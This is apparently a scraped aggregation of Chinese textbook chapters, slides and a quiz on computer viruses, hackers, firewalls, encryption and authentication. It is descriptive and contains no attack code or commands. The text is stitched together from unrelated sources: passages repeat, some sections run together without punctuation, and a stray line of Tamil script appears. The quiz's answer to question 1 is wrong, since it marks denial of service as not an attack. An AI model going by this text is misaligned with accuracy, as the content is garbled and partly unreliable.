第9章、计算机病毒与黑客防范
合集下载
计算机病毒和计算机黑客
计算机病毒和计算机黑客在当今数字化的时代,计算机已经成为我们生活和工作中不可或缺的一部分。
然而,伴随着计算机技术的飞速发展,计算机病毒和计算机黑客这两个“数字恶魔”也给我们带来了巨大的威胁和困扰。
计算机病毒,就像是隐藏在计算机世界里的“病魔”,它具有隐蔽性、传染性和破坏性等特点。
它可以悄无声息地潜入我们的计算机系统,然后在合适的时机爆发,给我们带来各种各样的麻烦。
计算机病毒的产生,有的是出于一些不法分子的恶意,为了获取非法利益或者满足自己的破坏欲望。
有的则是一些技术爱好者的无意之举,他们在探索计算机技术的过程中,不小心制造出了具有破坏力的程序。
这些病毒一旦进入我们的计算机,就会开始它的破坏之旅。
它们可能会篡改我们的文件,导致重要数据丢失或者损坏。
也可能会占用大量的系统资源,让计算机变得异常缓慢,甚至死机。
还有一些病毒会窃取我们的个人信息,如账号密码、银行卡信息等,给我们的财产安全带来严重威胁。
比如,曾经肆虐一时的“熊猫烧香”病毒,它会让用户的电脑出现蓝屏、频繁重启以及系统硬盘中的数据文件被破坏等问题,给无数用户造成了巨大的损失。
还有“勒索病毒”,它会加密用户的重要文件,然后向用户勒索赎金,否则就不恢复文件。
与计算机病毒相比,计算机黑客则更像是一群“数字强盗”。
他们凭借着高超的计算机技术,突破计算机系统的防护,获取未经授权的访问权限。
计算机黑客的行为动机也是多种多样的。
有的是为了展示自己的技术能力,追求所谓的“成就感”。
有的则是为了获取经济利益,通过窃取商业机密、贩卖用户信息等方式谋取暴利。
还有一些黑客是受雇于某些组织或个人,进行有针对性的攻击,以达到破坏竞争对手、获取情报等目的。
黑客的攻击手段也是五花八门。
他们可能会通过网络扫描,寻找计算机系统的漏洞,然后利用这些漏洞入侵系统。
也可能会进行网络监听,窃取用户在网络上传输的敏感信息。
还有的会发起拒绝服务攻击,让目标网站或者服务器瘫痪,无法正常提供服务。
第9章_信息安全与职业道德
信息安全涉及的主要问题
• • • • • • 网络攻击与攻击检测、防范问题 安全漏洞与安全对策问题 信息安全保密问题 系统内部安全防范问题 防病毒问题 数据备份与恢复问题、灾难恢复问题
信息安全策略
• • • 先进的信息安全技术是网络安全的根本保证。 严格的安全管理。 制订严格的法律、法规。
个人网络信息安全策略有如下几项: 个人信息定期备份,以防万一而损失有用信息。 谨防病毒攻击,特别是特洛伊木马病毒。 借助ISP或Modem提供的防火墙功能。 关闭“共享”功能,防止别有用心的人通过“共享”功能控 制你的机器。 不厌其烦地安装补丁程序。 使用代理服务器等于在你的机器面前设置了一道屏障,可以 抵御外部对你的机器的直接攻击,从而可以保障机器的安全。
பைடு நூலகம்
9.2.4 身份认证技术
• (1)基于主体特征的认证:磁卡和IC卡 、指 纹、视网膜等识别信息。 • (2)口令机制:一次性口令、加密口令、限 定次数口令。 • (3)基于公钥的认证:安全套接层协议SSL (Secure Socket Layer)、安全电子交易协议 SET(Secure Electronic Transaction)和身份 认证协议(Kerberos)。
网络权限控制目录级1用户名的识别与验证2用户口令的识别与验证3用户账号的缺省限制检查用户对网络资源的访问权限可以用访问控制表来描述922数据加密技术所谓数据加密技术指将一个信息经过加密钥匙及加密函数转换变成无意义的密文而接收方则将此密文经过解密函数解密钥匙还原成明文
第9章 信息安全与职业道德
• • • • 信息安全概述 信息安全技术 计算机病毒及其防治 信息化社会法律意识与道德规范
电脑 病毒 造成 巨大
损失
计算机病毒与反病毒技术 课后习题答案
注:12.19更新第三章第2题、第5题的感染机制答案《计算机病毒》复习思考题第一章计算机病毒概述1. 简述计算机病毒的定义和特征。
计算机病毒(Computer Virus),是一种人为制造的、能够进行自我复制的、具有对计算机资源进行破坏作用的一组程序或指令集合。
计算机病毒的可执行性(程序性)、传染性、非授权性、隐蔽性、潜伏性、可触发性、破坏性、攻击的主动性、针对性、衍生性、寄生性(依附性)、不可预见性、诱惑欺骗性、持久性。
2. 计算机病毒有哪些分类方法?根据每种分类方法,试举出一到两个病毒。
3. 为什么同一个病毒会有多个不同的名称?如何通过病毒的名称识别病毒的类型?国际上对病毒命名的一般惯例为“前缀+病毒名+后缀”,即三元组命名规则。
1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。
2、蠕虫病毒蠕虫病毒的前缀是:Worm。
3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为Hack 。
4、脚本病毒脚本病毒的前缀是:Script。
5、宏病毒其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。
宏病毒的前缀是:Macro。
6、后门病毒后门病毒的前缀是:Backdoor。
7、病毒种植程序病毒后门病毒的前缀是:Dropper。
这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。
8.破坏性程序病毒破坏性程序病毒的前缀是:Harm。
这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。
9.玩笑病毒玩笑病毒的前缀是:Joke。
10.捆绑机病毒捆绑机病毒的前缀是:Binder。
4. 简述计算机病毒产生的背景。
5. 计算机病毒有哪些传播途径?传播途径有两种,一种是通过网络传播,一种是通过硬件设备传播(软盘、U盘、光盘、硬盘、存储卡等)。
网络传播,又分为因特网传播和局域网传播两种。
第9章计算机安全课件
⑴ 宏病毒的类型 宏病毒是使用某个应用程序自带的宏编程语言,编写的病毒。目前国际上已发现三类宏病毒:感染WORD系统的WORD宏病毒、感染EXCEL系统的EXCEL宏病毒和感染Lotus Ami Pro的宏病毒。 ⑵ 宏病毒有以下特点: ① 感染数据文件;② 多平台交叉感染;③ 容易编写;④ 容易传播。 另外,宏病毒还可以根据触发条件来分类。若依据触发条件,宏病毒大致可分为公用宏病毒和私用宏病毒两类。 宏病毒的防治相对比较容易,目前大多数防病毒软件都能查杀宏病毒。 2)CIH病毒 CIH病毒,使用面向Windows的VxD技术编制,1998年8月从台湾传入国内,有1.2版、1.3版、1.4版三个版本,发作时间分别是4月26日、6月26日和每月的26日。 CIH病毒是第一个直接攻击和破坏计算机硬件系统的病毒,
5. 存储器保护与通信网络安全 1)存储器保护:指对实存储器划分互斥分区,使不同用户有自己的数据存储区域;对虚存储器设定虚存空间的长度来保护程序或数据不受破坏。 2)通信网络安全:指通信网络中的数据加密、网络的端口保护、网络中的主体验证、网络中的数据完整性保护和网络中的通信流分析控制等。 6. 软件与数据库安全 软件与数据库安全涉及信息存储和处理状态下的保护。因此应采取的措施有:设置保护数据完整的安全机构;进行存取控制;实行推断控制等。
3. 计算机实体安全 计算机实体安全是指对场地环境、设施、设备、载体及人员采取的安全对策和措施。具体内容如下: 1)温度与湿度:机房温度在18 ~24 0C、相对湿度40%~60% 。 2)清洁度与采光照明:机房应采用30万级清洁室、粒度0.5m并有足够的照度。 3)防静电、电磁干扰及噪声:机房设备要接地线、磁场强度 800奥斯特、噪声标准应控制在65dB以下。 4)防火、防水及防震:机房应设在二或三楼、考虑防震、要配备灭火器。 5)电源安全与电压稳定:保证供电连续、电压稳定在220V10% 。 4.计算机的正确使用与维护 1)计算机的正常使用,应注意以下事项: ⑴ 严格开关机顺序,开机时应先开外部设备,后开主机;关机顺序则相反。 ⑵ 在计算机运行时,严禁拔插电源或信号电缆,磁盘读写时
防范信息系统恶意攻击(练习+答案)
第九章专题二防范信息系统恶意攻击一、单选题1.信息系统的恶意攻击不包括( D )。
A.恶意代码B.口令攻击C.偶然事故D.拒绝服务2.非法访问、破坏、伪造、篡改信息的攻击行为属于(B )。
A.被动攻击B.主动攻击C.漏洞攻击D.黑客攻击3.以下不属于恶意程序的是(D )。
A.木马B.僵尸程序C.蠕虫病毒D.用户自编的程序4.授权用户的合法访问被无条件拒绝的攻击属于( B )。
A.被动攻击B.拒绝服务攻击C.口令攻击D.恶意代码攻击5.信息安全主要技术包括(D )。
①防火墙技术②入侵检测技术③加密技术④灾难备份技术A.①②④B.②③④C.①②③D.①②③④6.信息加密技术不能提供的信息安全服务是( A )。
A.信息鉴别B.保护信息机密性C.保护信息完整性D.保证信息的可用性7.保障信息安全最基本、最核心的技术措施是( B )。
A.反诈骗技术B.信息加密技术C.反病毒技术D.防火墙技术8.以下有关计算机病毒的说法,不正确的是( C )。
A.计算机病毒是人为编制的有害程序B.计算机病毒是一种非授权的可执行程序C.计算机病毒是一种有逻辑错误的小程序D.计算机病毒通过自我复制再传染给其它计算机9.以下不会导致计算机感染病毒的行为是(C )。
A.从网络上下载程序B.接收陌生邮件C.从键盘上输入文字D.运行从网络上下载的程序10.计算机病毒的危害表现在( D )。
A.损伤计算机的硬盘B.使计算机内存芯片损坏C.伤害计算机用户的身体健康D.影响程序的执行,破坏用户数据和程序11.当发现计算机系统受到计算机病毒侵害时,应采取的合理措施是(A )。
A.立即对计算机进行病毒检测、查杀B.立即断开网络,以后不再上网C.重新启动计算机,重装操作系统D.立即删除可能感染病毒的所有文件12.下列预防计算机病毒的措施中,合适的有(B )。
①对重要的数据定期进行备份②安装并及时升级防病毒软件③禁止从网络下载任何文件④不安装来历不明的软件或盗版软件A.①②③B.①②④C.①③④D.②③④13.计算机病毒的主要传播途径有(B )。
第9章信息安全2016
安全电子交易协议SET(Secure Electronic Transaction)和身份认证 协议(Kerberos)。
*
9.2.5防火墙技术
1、防火墙的功能:
最常见的保证网 络安全的工具
专门用于保护网络内部安全的系统(用户、数据和资源的安全)。 从某种意义上说,防火墙是一种访问控制产品,可以是一台专属的硬 件,也可以是架设在一般硬件上的一套软件或一个软件。 一般来说,企业选用硬件防火墙,而个人用户则采用软件防火墙。
危害系统文件
* (2)文件型病毒:附属在可执行文件内的病毒,如DIR2、CIH病毒。 * (3)混合型病毒:集引导型和文件型病毒特性于一体,如New
century病毒。
毒。
* (4)宏病毒:利用Word和Excel宏作为载体的病毒,如七月杀手病 * (5)网络病毒:利用网络的通信功能,将自身从一个结点发送到
* 信息安全
* 9.1 信息安全概述 * 9.2 信息安全技术 * 9.3 计算机病毒及黑客的防范 * 9.4 信息化社会法律意识与道德规范
*9.1 信息安全概述
*信息安全(Information
Security)通常是指信息在采集、 传递、存储和应用等过程中的完整性、机密性、可用性、 可控性和不可否认性。
加 密 技 术 分 类
对称加密算法:使用相同的密钥加密和解密的算法 (如DES算 法)
例如:将每一个字母加5, 即a加密成f,b加密成g.这种算法的密钥就 是5,此加密算法使用的是对称加密技术
非对称加密算法:使用不同的密钥加密和解密的算法 (如RSA 密码体制)
* 9.2.3数字签名和数字证书技术
法律、历史、文化和道德等诸多方面。
*信息安全不单纯是技术问题,它涉及技术、管理、制度、
*
9.2.5防火墙技术
1、防火墙的功能:
最常见的保证网 络安全的工具
专门用于保护网络内部安全的系统(用户、数据和资源的安全)。 从某种意义上说,防火墙是一种访问控制产品,可以是一台专属的硬 件,也可以是架设在一般硬件上的一套软件或一个软件。 一般来说,企业选用硬件防火墙,而个人用户则采用软件防火墙。
危害系统文件
* (2)文件型病毒:附属在可执行文件内的病毒,如DIR2、CIH病毒。 * (3)混合型病毒:集引导型和文件型病毒特性于一体,如New
century病毒。
毒。
* (4)宏病毒:利用Word和Excel宏作为载体的病毒,如七月杀手病 * (5)网络病毒:利用网络的通信功能,将自身从一个结点发送到
* 信息安全
* 9.1 信息安全概述 * 9.2 信息安全技术 * 9.3 计算机病毒及黑客的防范 * 9.4 信息化社会法律意识与道德规范
*9.1 信息安全概述
*信息安全(Information
Security)通常是指信息在采集、 传递、存储和应用等过程中的完整性、机密性、可用性、 可控性和不可否认性。
加 密 技 术 分 类
对称加密算法:使用相同的密钥加密和解密的算法 (如DES算 法)
例如:将每一个字母加5, 即a加密成f,b加密成g.这种算法的密钥就 是5,此加密算法使用的是对称加密技术
非对称加密算法:使用不同的密钥加密和解密的算法 (如RSA 密码体制)
* 9.2.3数字签名和数字证书技术
法律、历史、文化和道德等诸多方面。
*信息安全不单纯是技术问题,它涉及技术、管理、制度、
《网络空间安全导论》第9章 计算机病毒与恶意软件
9.4 恶意软件
恶意软件俗称流氓软件,是对破坏系统正常运行的软件的统称。恶意 软件介于病毒软件和正规软件之间,同时具备正常功能(下载、媒体 播放等)和恶意行为(弹广告、开后门),给用户带来实质危害。 目前,互联网上有许多恶意软件猪、划词搜索等 。
9.1 计算机病毒概述
9.1.1 计算机病毒简介 计算机病毒(Computer Virus)是攻击者编写的破坏计算 机功能或者数据的代码,能影响计算机的使用,能自我复 制的一组计算机指令或者程序代码。 计算机病毒是一段程序,一段可执行的代码。就像生物病 毒一样,具有自我繁殖、互相传染以及激活再生等生物病 毒特征。计算机病毒有独特的复制能力,它们能够快速蔓 延,又常常难以根除。它们能把自身附着在各种类型的文 件上,当文件被复制或从一个用户传送到另一个用户时, 它们就随同文件一起蔓延开来。
9.4 恶意软件
9.4.1 恶意软件的概述 在中国对于恶意软件定义最权威的要属于中国互联网协会反恶意软件 协调工作组对恶意软件的定义。2006 年,中国互联网协会反恶意软件 协调工作组在充分听取成员单位意见的基础上,最终确定了“恶意软 件”定义并向社会公布: 恶意软件俗称“流氓软件”,是指在未明确提示用户或未经用户许可 的情况下,在用户计算机或其他终端上安装运行,侵害用户合法权益 的软件,但不包含我国法律法规规定的计算机病毒。
9.2 典型的计算机病毒分析
9.2.3 “梅利莎(Melissa)”病毒 “梅丽莎”病毒,是1998年春天,由美国人大卫·L·史密斯运用Word 的宏运算编写出的一个电脑病毒,其主要是通过邮件传播。邮件的标 题通常为“这是给你的资料,不要让任何人看见”。
9.2 典型的计算机病毒分析
9.2.4 “爱虫(I love you)” 病毒 爱虫病毒(Vbs.loveletter),又称“我爱你”(I Love You)病毒,是一种 蠕虫病毒,它与1999年的梅丽莎病毒非常相似。这个病毒可以改写本 地及网络硬盘上面的某些文件,如.VBS、.HTA、.JPG、.MP3等十二 种数据文件。用户机器染毒以后,邮件系统将会变慢,并可能导致整 个网络系统崩溃,在全球更是造成了百亿美元的损失。
信息技术PPT 第9章 计算机安全
入侵型病毒—这种病毒是将病毒程序的一部分插入 到合法的主程序中,破坏原程序。
源码型病毒—这种病毒是在源程序被编译前,将病 毒程序插入到高级语言编写的源程序中,经过编译 后,成为可执行程序的合法部分,危害较大。
计算机病毒的传播途径
通过软盘、光盘、移动存储器等传染 通过机器传播 通过网络传播
卡巴斯基(kaspersky)、诺顿(Norton)、迈克 菲 (McAfee)、瑞星、江民(KV3000)、金山毒霸
杀毒软件的更新(升级)
为保证杀毒软件对新出现的病毒能够识别并进 行查杀,杀毒软件需要定期进行病毒库的更 新—即常说的升级。
计算机黑客
“黑客”最早源自英文“hacker”,原指热心于 计算机技术,水平高超的电脑专家,尤其是程 序设计人员。早期在美国的电脑界是带有褒义 的。但到了今天,黑客一词已被用于泛指那些 专门利用网络进行非法入侵、破坏或恶作剧的 人。
计算机病毒的防治
1. 尽量避免使用来历不明的磁盘 2. 尽量使用硬盘启动系统 3. 对不需写入数据的磁盘进行写保护 4. 养成良好的数据备份习惯 5. 慎用网上下载软件 6. 严格管理制度 7. 定期检查 8. 安装杀毒软件
杀毒软件
定义: 杀毒软件是一种专门用来查杀病毒的程序,
也称“反病毒软件(Anti-virus Software)”或“安全 防护软件(Safe-defend Software)”。它的主要作用 就是查杀病毒,还可以主动监控、防御病毒。 常用杀毒软件:
计算机的安全操作(软件安全)
计算机病毒 计算机黑客
计算机病毒
计算机病毒,是指编制或者在计算机程序中插 入的破坏计算机功能或者毁坏数据,影响计算 机使用,并能自我复制的一组计算机指令或者 程序代码。
源码型病毒—这种病毒是在源程序被编译前,将病 毒程序插入到高级语言编写的源程序中,经过编译 后,成为可执行程序的合法部分,危害较大。
计算机病毒的传播途径
通过软盘、光盘、移动存储器等传染 通过机器传播 通过网络传播
卡巴斯基(kaspersky)、诺顿(Norton)、迈克 菲 (McAfee)、瑞星、江民(KV3000)、金山毒霸
杀毒软件的更新(升级)
为保证杀毒软件对新出现的病毒能够识别并进 行查杀,杀毒软件需要定期进行病毒库的更 新—即常说的升级。
计算机黑客
“黑客”最早源自英文“hacker”,原指热心于 计算机技术,水平高超的电脑专家,尤其是程 序设计人员。早期在美国的电脑界是带有褒义 的。但到了今天,黑客一词已被用于泛指那些 专门利用网络进行非法入侵、破坏或恶作剧的 人。
计算机病毒的防治
1. 尽量避免使用来历不明的磁盘 2. 尽量使用硬盘启动系统 3. 对不需写入数据的磁盘进行写保护 4. 养成良好的数据备份习惯 5. 慎用网上下载软件 6. 严格管理制度 7. 定期检查 8. 安装杀毒软件
杀毒软件
定义: 杀毒软件是一种专门用来查杀病毒的程序,
也称“反病毒软件(Anti-virus Software)”或“安全 防护软件(Safe-defend Software)”。它的主要作用 就是查杀病毒,还可以主动监控、防御病毒。 常用杀毒软件:
计算机的安全操作(软件安全)
计算机病毒 计算机黑客
计算机病毒
计算机病毒,是指编制或者在计算机程序中插 入的破坏计算机功能或者毁坏数据,影响计算 机使用,并能自我复制的一组计算机指令或者 程序代码。
计算机安全基础
第9章计算机信息安全
随着计算机应用范围越来越广泛,尤其Internet应用的普及,各行各业对计算机网络的依赖程度也越来越高,这种高度依赖将使社会变得十分“脆弱”,一旦网络受到攻击,轻者不能正常工作,重者危机国家安全。
本章介绍计算机信息系统安全的基本知识,讲解提高Windows系统安全性的方法,以及瑞星杀毒软件、木马克星、天网防火墙的使用。
非授权访问
冒充合法用户
破坏数据的完整性
干扰系统正常运行
病毒与恶意攻击及线路窃听
9.1.3信息安全保障措施
物理安全
网络安全
数据备份
病毒防护
系统安全
事故处理、紧急响应
复查审计
设立信息安全监控制度
9.2计算机病毒及防治
9.2.1什么是计算机病毒
计算机病毒(Computer Viruses)是一种人为的特制小程序,它具有自我复制能力,能通过非授权入侵而隐藏在可执行程序和数据文件中,从而影响并破坏正常程序的执行和数据安全,通常具有相当大的破坏性。
9.1.1信息安全的定义
信息(Information)是通过在数据上施加某些约定而赋予这些数据的特殊含义
计算机信息安全是指计算机信息系统的硬件、软件、网络及系统中的数据受到保护,不受偶然的或者恶意的原因而遭到破坏、更改、泄露,系统能连续、可靠、正常地运行,信息服务不中断
保密性(Confidentiality)
8.制定物理安全措施
9.3.4网络黑客
今天,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙,
1.常用黑客手段
(1)获取口令
(2)电子邮件攻击
(3)放置特洛伊木马程序
(4)诱入法
(5)WWW的欺骗技术
(6)寻找系统漏洞
随着计算机应用范围越来越广泛,尤其Internet应用的普及,各行各业对计算机网络的依赖程度也越来越高,这种高度依赖将使社会变得十分“脆弱”,一旦网络受到攻击,轻者不能正常工作,重者危机国家安全。
本章介绍计算机信息系统安全的基本知识,讲解提高Windows系统安全性的方法,以及瑞星杀毒软件、木马克星、天网防火墙的使用。
非授权访问
冒充合法用户
破坏数据的完整性
干扰系统正常运行
病毒与恶意攻击及线路窃听
9.1.3信息安全保障措施
物理安全
网络安全
数据备份
病毒防护
系统安全
事故处理、紧急响应
复查审计
设立信息安全监控制度
9.2计算机病毒及防治
9.2.1什么是计算机病毒
计算机病毒(Computer Viruses)是一种人为的特制小程序,它具有自我复制能力,能通过非授权入侵而隐藏在可执行程序和数据文件中,从而影响并破坏正常程序的执行和数据安全,通常具有相当大的破坏性。
9.1.1信息安全的定义
信息(Information)是通过在数据上施加某些约定而赋予这些数据的特殊含义
计算机信息安全是指计算机信息系统的硬件、软件、网络及系统中的数据受到保护,不受偶然的或者恶意的原因而遭到破坏、更改、泄露,系统能连续、可靠、正常地运行,信息服务不中断
保密性(Confidentiality)
8.制定物理安全措施
9.3.4网络黑客
今天,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙,
1.常用黑客手段
(1)获取口令
(2)电子邮件攻击
(3)放置特洛伊木马程序
(4)诱入法
(5)WWW的欺骗技术
(6)寻找系统漏洞
信息安全基础知识概述(PPT 39张)
可视化、 易操作、易管理 平台
高性能架构,面 对应用层威胁 应用识别与精细 控制
多模块联动, 一体化引擎 云、大数据分 析外部联动
第9章 信息安全基础知识9章 信息安全基础 知识
37
本章总结
计算机技术与网络技术的迅猛发展,信 息社会,大大提高了工作、学习效率, 丰富了我们的生活。
计算机安全问题成为亟待解决的问题。
计算机安全对于国家安全、经济发展、 社会稳定和人们的日常生活有着极为重 要的意义。
当代大学生要学习和掌握一定的信息安 全与管理知识,这样才能够在互联网上 有效的防止侵害,保卫自己的信息安全。
第9章 信息安全基础知识9章 信息安全基础 知识 38
本章结束,谢谢!
使用设备测量用户的生物特征并和用户档案进行对比。。
视网膜扫描 声纹识别 面部识别
使用光学设备发出的低强度光源扫描视网 膜上独特的图案,视网膜扫描是十分精确的。
是根据说话人的发音生理和行为特征,识别说 话人身份的一种生物识别方法。 计算机系统利用摄像机获取识别对象的面部图 像后与数据库图像进行比对,完成识别过程。
第9章 信息安全基础知识9章 信息安全基础 知识 32
1.防火墙的基本准则
一切未被允许的就是 禁止的 一切未被禁止的就是 允许的
第9章 信息安全基础知识9章 信息安全基础 知识
33
2.防火墙的基本功能
第9章 信息安全基础知识9章 信息安全基础 知识
34
3.防火墙的关键技术
代理服务 技术 状态监控技 术 包过滤技术
危害
正常的程序无法运行,计算机内的
第9章 信息安全基础知识9章 信息安全基础 文件被删除或受损。计算机引导扇区 知识 20
第9章 网络安全管理技术
信息资源包括维持网络服务运行的系统软件和应 用软件,以及在网络中存储和传输的用户信息等。
网络安全定义:
网络安全是指保护网络系统中的软件、硬件及数 据信息资源,使之免受偶然或恶意的破坏、盗用、暴 露和篡改,保证网络系统的正常运行、网络服务不受
中断而所采取的措施和行为。
对网络的被动攻击和主动攻击
源站
目的站
源站
目的站
源站
目的站 源站
目的站
截获 被动攻击
中断
篡改 主 动 攻 击
伪造
3.网络安全威胁 所谓的安全威胁是指某个实体(人、事件、程序
等)对某一资源可能造成的危害。是某些个别用心的
人通过一定的攻击手段来实现的。
安全威胁可分为故意的(如系统入侵)和偶然的
(如将信息发到错误地址)两类。
(1)基本的安全威胁
2.数字签名原理
签名机制的特征是该签名只有通过签名者的私有 信息才能产生,也就是说,一个签名者的签名只能惟 一地由他自己生成。 当收发双方发生争议时,第三方(仲裁机构)就 能够根据消息上的数字签名来裁定这条消息是否确实 由发送方发出,从而实现抗赖服务。
另外,数字签名应是所发送数据的函数,即签名 与消息相关,从而防止数字签名的伪造和重用。
DSKA ( X )
E 运算
明文 X
加密与解密 签名与核实签名
9.1.3
CA认证与数字凭证
所谓CA(Certificate Authority:证书发行机构), 是采用PKI(Public Key Infrastructure:公开密钥体系) 公开密钥技术,专门提供网络身份认证服务,负责签发和 管理数字证书,且具有权威性和公正性的第三方信任机构, 它的作用就像颁发证件的部门,如护照办理机构。 由于CA数字证书技术采用了加密传输和数字签名技 术,能够实现上述要求,因此在国内外电子商务中,都得 到了广泛的应用,以数字证书认证来保证交易能够得到正 常的执行。
网络安全定义:
网络安全是指保护网络系统中的软件、硬件及数 据信息资源,使之免受偶然或恶意的破坏、盗用、暴 露和篡改,保证网络系统的正常运行、网络服务不受
中断而所采取的措施和行为。
对网络的被动攻击和主动攻击
源站
目的站
源站
目的站
源站
目的站 源站
目的站
截获 被动攻击
中断
篡改 主 动 攻 击
伪造
3.网络安全威胁 所谓的安全威胁是指某个实体(人、事件、程序
等)对某一资源可能造成的危害。是某些个别用心的
人通过一定的攻击手段来实现的。
安全威胁可分为故意的(如系统入侵)和偶然的
(如将信息发到错误地址)两类。
(1)基本的安全威胁
2.数字签名原理
签名机制的特征是该签名只有通过签名者的私有 信息才能产生,也就是说,一个签名者的签名只能惟 一地由他自己生成。 当收发双方发生争议时,第三方(仲裁机构)就 能够根据消息上的数字签名来裁定这条消息是否确实 由发送方发出,从而实现抗赖服务。
另外,数字签名应是所发送数据的函数,即签名 与消息相关,从而防止数字签名的伪造和重用。
DSKA ( X )
E 运算
明文 X
加密与解密 签名与核实签名
9.1.3
CA认证与数字凭证
所谓CA(Certificate Authority:证书发行机构), 是采用PKI(Public Key Infrastructure:公开密钥体系) 公开密钥技术,专门提供网络身份认证服务,负责签发和 管理数字证书,且具有权威性和公正性的第三方信任机构, 它的作用就像颁发证件的部门,如护照办理机构。 由于CA数字证书技术采用了加密传输和数字签名技 术,能够实现上述要求,因此在国内外电子商务中,都得 到了广泛的应用,以数字证书认证来保证交易能够得到正 常的执行。
第9章计算机网络技术与应用
3.谨慎下载网络软件 目前有许多网站都提供了大量的免费软件,用户可以将这 些软件下载到自己的计算机中来使用。但随意下载软件很可能 会感染病毒,所以用户在下载程序时最好选择可靠的、有实力 的大型网站,这些网站的管理制度通常会比较完善,病毒存在 的可能性较小。
4.做好资料备份 现在病毒的更新速度很快,计算机随时都有感染病毒的可 能,所以为了用户的数据安全,做好资料的及时备份是避免计 算机中毒时丢失数据的最好方法。在平时的工作中,用户应该 做到以下几点:
图9.2.3 欢迎界面
(4)在该欢迎界面中单击“下一步”按钮,进入如图 9.2.4所示的许可协议界面。
图9.2.4 许可协议界面
(5)选中“我接受”单选按钮并单击“下一步”按钮,打 开如图9.2.5所示的输入产品序列号界面。
图9.2.5 产品序列号界面
(6)通常在安装光盘的包装盒上面标注有产品序列号和用 户ID,填好后单击“下一步”按钮,打开如图9.2.6所示的界面。
1.病毒安全 计算机病毒(Computer Virus,简称CV)是一种人为制造 的计算机程序,它对计算机有着极大的破坏性,它具有寄生、 繁殖和传播的特点。由于计算机网络要从多个节点接收信息, 因此极易感染病毒。当网络中的一台计算机一旦感染病毒,病 毒就会在网络内部呈指数级增长并再生,严重时在短时间内就 可能造成网络的瘫痪。
2.谨慎使用软盘和U盘 软盘和U盘是用户间交换信息的主要媒介,但也是病毒设 计者主要攻击的目标。一些病毒在检测到有软盘插入驱动器后, 就会设法将自己的代码复制上去。因此,为了降低被感染的概 率,用户应该打开软盘的防写入功能。当用户只须读取软盘中 的信息时,保持写保护可防止计算机中的病毒入侵;对于U盘 来说,由于它具有小巧、便携、容量大等诸多优点,目前已成 为一个应用最为广泛的移动存储工具,建议用户在每次使用之 前,都用杀毒软件对其进行扫描,以降低U盘与计算机间相互 感染病毒的风险。
网络安全技术与实践第9章 计算机病毒及恶意软件防范
冰河木马
① 连接自动运行 ② 远程控制 ③ 窃取账号密码 ④ 远程操作 ⑤ 点对点对话 ⑥ 注册表操作 ⑦ 发送信息
冰河木马的原理
一般完整的木马程序由两个部份组成:一是服务器(端)程序,二 是控制器程序。“中了木马”就是指安装了木马的服务器程序,若主机 被安装了服务器程序,则拥有控制器程序的攻击者就可通过网络控制其主 机。冰河木马用C++ Builder编写,服务端程序G- Server.exe一旦被激 活后,将在目标计算机的C:\ Windows \ system目录下自动生成两个可执 行 文 件 , 分 别 是 Kernel32.exe 和 Sysexplr.exe 。 若 用 户 只 找 到 Kernel32.exe,并将其删除,实际并未完全根除,只要打开任何一个文本文 件 或 可 执 行 程 序 ,Sysexplr.exe 就 会 被 激 活 而 再 次 生 成 一 个 新 的 Kernel32.exe,这就是导致冰河木马的屡删无效的关键原因。
2006年木马仍然是病毒主流,变种层出不穷
一、什么是计算机病毒
—— 1994.2.18 , 我 国 颁 布 《中华人民共和国计算机信息 系统安全保护条例》,在第28条规定:“计算机病毒,是指 编制或者在计算机程序中插入的破坏计算机功能或者毁坏数 据,影响计算机使用,并能自我复制的一组计算机指令或者 程序代码”。
二、发展简史
(1)计算机病毒的产生 计算机病毒概念的起源比较早,在第一部商用计算机推出前几年,计算机的先驱 者冯·诺依曼(John Von Neumann )在他的一篇论文《复杂自动装置的理论及组识的 进展》中,已经初步概述了计算机病毒程序的概念。之后,在美国著名的AT&T贝尔实 验室中,三个年轻人在工作之余,编制并玩过一种能够吃掉别人程序的称做“磁芯大 战”(Core war )的游戏程序,可以互相攻击。从而进一步将病毒程序“感染性”的 概念得以呈现。
计算机网络技术基础(微课版)(第6版)-PPT课件第 9 章 网络安全
第九章 网络安全
本章学习要点:
➢ 网络安全的现状与重要性 ➢ 防火墙技术 ➢ 网络加密技术 ➢ 数字证书与数字签名 ➢ 入侵检测技术 ➢ 网络防病毒技术 ➢ 网络安全技术的发展前景
9.1 网络安全的现状与重要性
9.1.1 网络安全的基本概念
ISO 将计算机安全定义为:为数据处理系统建立和采取的技术与管 理方面的安全保护,保护计算机软件数据、硬件不因偶然和恶意的原 因而遭到破坏、更改及泄露。
➢ 软件的漏洞或“后门”
➢ 企业网络内部
返回本节首页 返回本章首页
9.2 防火墙技术
9.2.1 防火墙的基本概念
1. 什么是防火墙
“防火墙”(Fire Wall)是用来连接两个网络并控制两个网络之间相 互访问的系统,如图9-1所示。它包括用于网络连接的软件和硬件以及控 制访问的方案。防火墙用于对进出的所有数据进行分析,并对用户进行 认证,从而防止有害信息进入受保护网,为网络提供安全保障。
为了在对称加密过程中有效地管理好密钥,保证数据的机密性,美 国麻省理工学院提出了一种基于可信赖的第三方的认证系统—— Kerberos。它是一种在开放式网络环境下进行身份认证的方法,使网 络上的用户可以相互证明自己的身份。
Kerberos采用对称密钥体制对信息进行加密。其基本思想是:能正 确对信息进行解密的用户就是合法用户。用户在对应用服务器进行访 问之前,必须先从第三方(Kerberos服务器)获取该应用服务器的访 问许可证(ticket)。
链路加密简单、容易实现,但由于全部报文都以明文形式通过各结点, 因此在这些结点上,数据容易受到非法存取的危险,而且每条链路都需 要一对加、解密设备和一个独立密钥,因此成本较高。
(2)结点加密
结点加密是对链路加密的改进,它也要为通信链路上传输的所有数据 进行加密,而且加密过程对用户是透明的。
本章学习要点:
➢ 网络安全的现状与重要性 ➢ 防火墙技术 ➢ 网络加密技术 ➢ 数字证书与数字签名 ➢ 入侵检测技术 ➢ 网络防病毒技术 ➢ 网络安全技术的发展前景
9.1 网络安全的现状与重要性
9.1.1 网络安全的基本概念
